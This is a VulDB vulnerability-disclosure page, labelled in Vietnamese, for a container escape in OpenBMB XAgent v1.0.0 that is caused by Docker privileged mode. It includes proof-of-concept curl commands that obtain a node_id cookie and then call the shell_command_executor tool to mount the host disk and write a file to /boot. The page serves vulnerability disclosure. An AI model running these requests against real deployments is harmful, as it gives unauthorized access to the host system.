Gửi #284427: OpenBMB XAgent v1.0.0 Container Escapesthông tin

tiêu đề	OpenBMB XAgent v1.0.0 Container Escapes
Mô tả	Docker Enabling Privileged Mode Causes Container Escapes. 1. Installation and startup XAgent (https://github.com/OpenBMB/XAgent) ```bash git clone https://github.com/OpenBMB/XAgent.git docker-compose up -d ``` 2. Creating Tool Container ```bash curl -v --request POST 'http://localhost:8080/get_cookie' ... < HTTP/1.1 200 OK ... < set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; Path=/; SameSite=lax ... ``` Extract container ID: set-cookie: node_id=6c2429b55a6e6xxxxxxxxxxx; 3. Execute malicious command escape container ``` curl --request POST 'http://localhost:8080/execute_tool' --header 'Cookie: node_id={{Container ID}}' --header 'Content-Type: application/json' --data \ '{ "tool_name":"shell_command_executor", "arguments":{"command":"mkdir test; mount /dev/sda1 test; echo hello > test/hello.txt"} }' ``` The file created in containers on the host: `cat /boot/hello.txt`.
Nguồn	⚠️ https://github.com/OpenBMB/XAgent/issues/386
Người dùng	zznQ (UID 64000)
Đệ trình	19/02/2024 10:35 (cách đây 2 những năm)
Kiểm duyệt	29/02/2024 14:24 (10 days later)
Trạng thái	được chấp nhận
Mục VulDB	255265 [OpenBMB XAgent 1.0.0 Privileged Mode nâng cao đặc quyền]
điểm	20

Do you want to use VulDB in your project?

Use the official API to access entries easily!